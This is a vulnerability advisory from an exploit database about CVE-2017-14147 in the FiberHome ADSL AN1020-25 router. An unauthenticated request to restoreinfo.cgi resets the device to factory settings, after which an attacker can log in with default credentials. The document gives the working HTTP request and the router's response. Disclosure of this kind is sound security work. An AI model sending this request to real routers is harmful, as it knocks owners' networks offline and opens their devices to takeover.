FiberHome ADSL AN1020-25 - Improper Access Restrictions

EDB-ID:

42649




Platform:

Hardware

Date:

2017-09-05


Title:
====

FiberHome Unauthenticated ADSL Router Factory Reset.

Credit:
======

Name: Ibad Shah
Twitter: @BeeFaauBee09
Website: beefaaubee09.github.io


CVE:
=====

CVE-2017-14147

Date:
====

05-09-2017 (dd/mm/yyyy)

About FiberHome:
======

FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.

Products & Services:
Wireless 3G/4G broadband devices
Custom engineered technologies
Broadband devices

URL : http://www.fiberhomegroup.com/


Description:
=======

This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password. 



Affected Device Model:
=============

FiberHome ADSL AN1020-25


Exploitation-Technique:
===================

Remote


Details:
=======

Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials.

1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147

Vulnerable restoreinfo.cgi



Proof Of Concept:
================

PoC : 

GET /restoreinfo.cgi HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close


HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Sat, 01 Jan 2000 00:12:39 GMT
Content-Type: text/html
Connection: close

<html>
<head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<link rel=stylesheet href='stylemain.css' type='text/css'>
<link rel=stylesheet href='colors.css' type='text/css'>
<script language="javascript">
<!-- hide

function restore() {
   var enblPopWin = '0';
   var loc = 'main.html';
   var code = 'window.top.location="' + loc + '"';

   if ( enblPopWin == '1' ) {
      loc = 'index.html';
      code = 'location="' + loc + '"';
   }

   eval(code);
}

function frmLoad() {
   setTimeout("restore()", 60000);
}

// done hiding -->
</script>
</head>

<body onLoad='frmLoad()'>
<blockquote>
<b>DSL Router Restore</b><br><br>
The DSL Router configuration has been restored to default settings and the
router is rebooting.<br><br>
Close the DSL Router Configuration window and wait for 2 minutes before
reopening your web browser. If necessary, reconfigure your PC's IP address to
match your new configuration.
</blockquote>
</body>
</html>



Credits:
=======

Ibad Shah, Taimooor Zafar, Owais Mehtab